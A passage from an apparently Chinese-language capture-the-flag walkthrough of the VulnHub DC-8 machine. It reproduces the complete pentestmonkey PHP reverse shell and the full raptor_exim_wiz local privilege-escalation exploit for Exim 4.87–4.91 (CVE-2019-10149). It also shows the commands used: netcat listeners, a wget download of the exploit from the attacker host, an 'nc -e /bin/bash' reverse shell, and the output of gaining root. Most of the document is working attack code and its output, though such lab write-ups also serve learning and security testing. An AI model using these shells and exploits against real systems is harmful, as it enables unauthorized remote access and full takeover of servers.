// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.6';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

编辑

保存

kali监听

1
2
3
root@JIYE:~# nc -nvlp 1234
listening on [any] 1234 ...

提交表单

kali get shell

1
2
3
4
5
6
7
8
9
root@JIYE:~# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 38376
Linux dc-8 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64 GNU/Linux
 11:58:10 up  1:26,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

升级shell

1
2
3
4
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ 

www-data@dc-8:/$

升级为交互shell

1
2
3
4
5
6
7
8
9
10
11
www-data@dc-8:/$ ^Z
[1]+  已停止               nc -nvlp 1234
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 1234

www-data@dc-8:/$ 
www-data@dc-8:/$ whoami
www-data
www-data@dc-8:/$ pwd
/
www-data@dc-8:/$

0x10.提权

SUID提权,exim4具有SUID标识

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@dc-8:/$ find / -perm -4000 2>/dev/null 
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/$

查看exim4版本,为4.89

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@dc-8:/$ exim4 --help
Exim is a Mail Transfer Agent. It is normally called by Mail User Agents,
not directly from a shell command line. Options and/or arguments control
what it does when called. For a list of options, see the Exim documentation.
www-data@dc-8:/$
www-data@dc-8:/$ exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
www-data@dc-8:/$

Google exim4 4.89 exploit

复制源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
root@JIYE:~/vulnhub/dc8# cat exim.sh
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
# Improper validation of recipient address in deliver_message() 
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return 
# of the WIZard" vulnerability reported by the Qualys Security 
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
        echo "$0 [-m METHOD]"
        echo
        echo "-m setuid : use the setuid payload (default)"
        echo "-m netcat : use the netcat payload"
        echo
        exit 1
}

# payload delivery
function exploit()
{
        # connect to localhost:25
        exec 3<>/dev/tcp/localhost/25

        # deliver the payload
        read -u 3 && echo $REPLY
        echo "helo localhost" >&3
        read -u 3 && echo $REPLY
        echo "mail from:<>" >&3
        read -u 3 && echo $REPLY
        echo "rcpt to:<$PAYLOAD>" >&3
        read -u 3 && echo $REPLY
        echo "data" >&3
        read -u 3 && echo $REPLY
        for i in {1..31}
        do
                echo "Received: $i" >&3
        done
        echo "." >&3
        read -u 3 && echo $REPLY
        echo "quit" >&3
        read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
        case $1 in
                -m) shift; METHOD="$1"; shift;;
                * ) usage
                ;;
        esac
done
if [ -z $METHOD ]; then
        usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

        # prepare a setuid shell helper to circumvent bash checks
        echo "Preparing setuid shell helper..."
        echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
        gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
        if [ $? -ne 0 ]; then
                echo "Problems compiling setuid shell helper, check your gcc."
                echo "Falling back to the /bin/sh method."
                cp /bin/sh /tmp/pwned
        fi
        echo

        # select and deliver the payload
        echo "Delivering $METHOD payload..."
        PAYLOAD=$PAYLOAD_SETUID
        exploit
        echo

        # wait for the magic to happen and spawn our shell
        echo "Waiting 5 seconds..."
        sleep 5
        ls -l /tmp/pwned
        /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

        # select and deliver the payload
        echo "Delivering $METHOD payload..."
        PAYLOAD=$PAYLOAD_NETCAT
        exploit
        echo

        # wait for the magic to happen and spawn our shell
        echo "Waiting 5 seconds..."
        sleep 5
        nc -v 127.0.0.1 31337

# print help
else
        usage
fid
root@JIYE:~/vulnhub/dc8#

上传exp

1
2
3
4
5
6
root@JIYE:~/vulnhub/dc8# ls
exim.sh  nmap.demo  nmap.sP  re.php  user.txt
root@JIYE:~/vulnhub/dc8# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.3 - - [30/Aug/2020 22:26:17] "GET /exim.exp HTTP/1.1" 200 -

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@dc-8:/tmp$ wget http://192.168.1.6/exim.sh
--2020-08-31 12:26:18--  http://192.168.1.6/exim.sh
Connecting to 192.168.1.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3547 (3.5K) [application/octet-stream]
Saving to: 'exim.exp'

exim.exp            100%[===================>]   3.46K  --.-KB/s    in 0s      

2020-08-31 12:26:18 (111 MB/s) - 'exim.exp' saved [3547/3547]

www-data@dc-8:/tmp$ ls
exim.sh

执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
www-data@dc-8:/tmp$ ./exim.sh 

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Mon, 31 Aug 2020 12:48:46 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1kCZsE-0000Ie-4N
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Aug 31 12:48 /tmp/pwned
$

带参数执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ./exim.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 31 Aug 2020 12:50:17 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1kCZth-0000Ix-1C
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open

kali监听

1
2
3
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

反弹shell

1
2
3
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
nc -e /bin/bash 192.168.1.6 6666
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 59564
whoami
root
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
ls
flag.txt
cat flag.txt








Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
-------------纸短情长下次再见-------------